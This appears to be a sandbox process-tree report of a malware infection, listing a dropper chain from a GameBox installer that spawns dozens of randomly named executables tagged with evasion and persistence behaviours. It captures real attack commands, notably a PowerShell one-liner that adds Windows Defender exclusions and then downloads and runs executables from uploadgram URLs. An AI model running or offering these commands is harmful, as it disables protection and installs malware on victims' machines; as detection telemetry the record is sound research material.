C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe28⤵PID:7828
-
-
C:\Windows\SysWOW64\PING.EXEping GFBFPSXA -n 309⤵
- Runs ping.exe
PID:2532
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2072 -
C:\Users\Admin\Documents\qL6aTZpt7EGmGbtBJS6N5qFn.exe"C:\Users\Admin\Documents\qL6aTZpt7EGmGbtBJS6N5qFn.exe"6⤵PID:5908
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit7⤵PID:7904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'8⤵PID:3804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'8⤵PID:7372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'8⤵PID:5252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'8⤵PID:8360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')8⤵PID:4792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')8⤵PID:7636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')8⤵PID:8392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'8⤵
- Blocklisted process makes network request
PID:8600 -
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"9⤵PID:6728
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit10⤵PID:3308
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'11⤵PID:8540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'11⤵PID:8080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'11⤵
- Modifies registry class
PID:8384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'11⤵PID:896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'8⤵
- Suspicious use of SendNotifyMessage
PID:4264 -
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"9⤵
- Checks computer location settings
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: SetClipboardViewer
PID:6024
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'8⤵PID:6348
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"C:\Users\Admin\AppData\Local\Temp\launcher.exe"9⤵
- Suspicious use of SetThreadContext
PID:7020 -
C:\Users\Admin\AppData\Local\Temp\launcher.exe"{path}"10⤵PID:2608
-
-
C:\Users\Admin\Documents\SVvTp6XVgmDjaupwhiCU_XLU.exe"C:\Users\Admin\Documents\SVvTp6XVgmDjaupwhiCU_XLU.exe"6⤵PID:6980
-
-
C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe"C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe"6⤵
- Suspicious use of SetThreadContext
PID:4872 -
C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exeC:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe7⤵PID:7084
-
-
-
C:\Users\Admin\Documents\R4FS14llhaVLNhuh_1UBG_AQ.exe"C:\Users\Admin\Documents\R4FS14llhaVLNhuh_1UBG_AQ.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7064
-
-
C:\Users\Admin\Documents\XlOBmTALDmdzGggBxgXkTNmj.exe"C:\Users\Admin\Documents\XlOBmTALDmdzGggBxgXkTNmj.exe"6⤵PID:7128
-
-
C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe"C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe"6⤵PID:4932
-
C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe"C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe" -q7⤵PID:2456
-
-
-
C:\Users\Admin\Documents\53PbrfpT0qr62bA86N2Ta3Bh.exe"C:\Users\Admin\Documents\53PbrfpT0qr62bA86N2Ta3Bh.exe"6⤵PID:7032
-
C:\Users\Admin\AppData\Roaming\2584156.exe"C:\Users\Admin\AppData\Roaming\2584156.exe"7⤵PID:8056
-
-
C:\Users\Admin\AppData\Roaming\5515754.exe"C:\Users\Admin\AppData\Roaming\5515754.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:6892
-
-
C:\Users\Admin\AppData\Roaming\3230219.exe"C:\Users\Admin\AppData\Roaming\3230219.exe"7⤵PID:5964
-
-
-
C:\Users\Admin\Documents\tBIIRqgrtYKUb48H5anb4_Tw.exe"C:\Users\Admin\Documents\tBIIRqgrtYKUb48H5anb4_Tw.exe"6⤵PID:6092
-
-
C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe"C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe"6⤵
- Suspicious use of SetThreadContext
PID:5604 -
C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exeC:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe7⤵PID:7792
-
-
-
C:\Users\Admin\Documents\RQU1Eeyjr6k0VykU51pCFFZr.exe"C:\Users\Admin\Documents\RQU1Eeyjr6k0VykU51pCFFZr.exe"6⤵PID:6392
-
-
C:\Users\Admin\Documents\0UDlIYAqdx58fbBuKxF2FjgJ.exe"C:\Users\Admin\Documents\0UDlIYAqdx58fbBuKxF2FjgJ.exe"6⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2460
-
-
C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"6⤵PID:6532
-
C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"7⤵
- Modifies data under HKEY_USERS
PID:300
-
-
-
C:\Users\Admin\Documents\Osccyot2yP01jdLiZSrbU4EO.exe"C:\Users\Admin\Documents\Osccyot2yP01jdLiZSrbU4EO.exe"6⤵PID:6672
-
-
C:\Users\Admin\Documents\6UIpSNXQ6X1bGK6xwzbZrjMo.exe"C:\Users\Admin\Documents\6UIpSNXQ6X1bGK6xwzbZrjMo.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6468
-
-
C:\Users\Admin\Documents\QzzWzAr_j9Kq5r6IcoTisXGL.exe"C:\Users\Admin\Documents\QzzWzAr_j9Kq5r6IcoTisXGL.exe"6⤵PID:6248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 6687⤵
- Program crash
PID:7264
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 6527⤵
- Program crash
PID:7660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 6807⤵
- Program crash
PID:7960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 6367⤵
- Program crash
PID:8088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 11287⤵
- Program crash
PID:7436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 10767⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5864
-
-
-
C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe"C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe"6⤵
- Suspicious use of SetThreadContext
PID:5368 -
C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exeC:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe7⤵PID:7724
-
-
-
C:\Users\Admin\Documents\bUfEnV2QckatfhO4vurM77nc.exe"C:\Users\Admin\Documents\bUfEnV2QckatfhO4vurM77nc.exe"6⤵PID:5780
-
-
C:\Users\Admin\Documents\vwqOzdi1PVwJK8OTScrNyxPr.exe"C:\Users\Admin\Documents\vwqOzdi1PVwJK8OTScrNyxPr.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7252
-
-
C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe"C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe"6⤵
- Suspicious use of SetThreadContext
PID:7244 -
C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exeC:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe7⤵PID:5548
-
-
C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exeC:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe7⤵PID:5820
-
-
-
C:\Users\Admin\Documents\Od44Rf8EHJH4T2sW1PLJmC6c.exe"C:\Users\Admin\Documents\Od44Rf8EHJH4T2sW1PLJmC6c.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7236
-
-
C:\Users\Admin\Documents\qwwWF3SlQK2K0TSU2M1vJNke.exe"C:\Users\Admin\Documents\qwwWF3SlQK2K0TSU2M1vJNke.exe"6⤵PID:7228
-
-
C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"6⤵PID:5252
-
C:\Users\Admin\AppData\Local\Temp\is-5QRTQ.tmp\eHGLHEnRYqK4VhmYDOUgPfia.tmp"C:\Users\Admin\AppData\Local\Temp\is-5QRTQ.tmp\eHGLHEnRYqK4VhmYDOUgPfia.tmp" /SL5="$402DE,138429,56832,C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:7492 -
C:\Users\Admin\AppData\Local\Temp\is-MH328.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MH328.tmp\Setup.exe" /Verysilent8⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5420 -
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:8484 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵
- Executes dropped EXE
PID:5636
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:3936 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies registry class
PID:5340
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5128 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5148
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:7672 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 028F6052A2FE8BC8C915EF71D623C722 C2⤵
- Loads dropped DLL
PID:5868
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EC92D0FE9FD9F6C81FC82B7F1C1F2A45 C2⤵
- Loads dropped DLL
- Suspicious use of SendNotifyMessage
PID:6312
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E1B3CB1C65ADCF600ADC47B52EDD9692 C2⤵
- Loads dropped DLL
PID:6808
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B982EE1D12FC5573F3D061FDE4B3E4C62⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4240
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
PID:5276 -
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default3⤵
- Loads dropped DLL
- Adds Run key to start application
PID:9124 -
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--Ac4FtzsAeC"4⤵
- Checks computer location settings
PID:5268 -
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffa8d3c9ec0,0x7ffa8d3c9ed0,0x7ffa8d3c9ee05⤵PID:8372
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=2132 /prefetch:85⤵PID:4700
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=1772 /prefetch:85⤵PID:9172
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1696 /prefetch:25⤵PID:8928
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2616 /prefetch:15⤵
- Checks computer location settings
PID:8832
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2204 /prefetch:25⤵PID:4224
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=2200 /prefetch:85⤵PID:2276
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3420 /prefetch:85⤵PID:8392
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3280 /prefetch:85⤵
- Suspicious use of SendNotifyMessage
PID:7520
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3344 /prefetch:85⤵PID:8028
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3412 /prefetch:85⤵PID:8812
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D327.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
PID:2320
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7756 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5580
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8736 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6948
-
-
C:\Users\Admin\AppData\Local\Temp\CE4F.exeC:\Users\Admin\AppData\Local\Temp\CE4F.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8868
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6788
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8672
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6724 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Suspicious use of SendNotifyMessage
PID:6452
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:8204 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{75031801-02a9-6e4f-9ca6-98660627b607}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:9088
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"2⤵PID:5152
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6592
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:3472
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:8948
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6024
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5152 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
PID:5176
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6132
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8384
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5132
-
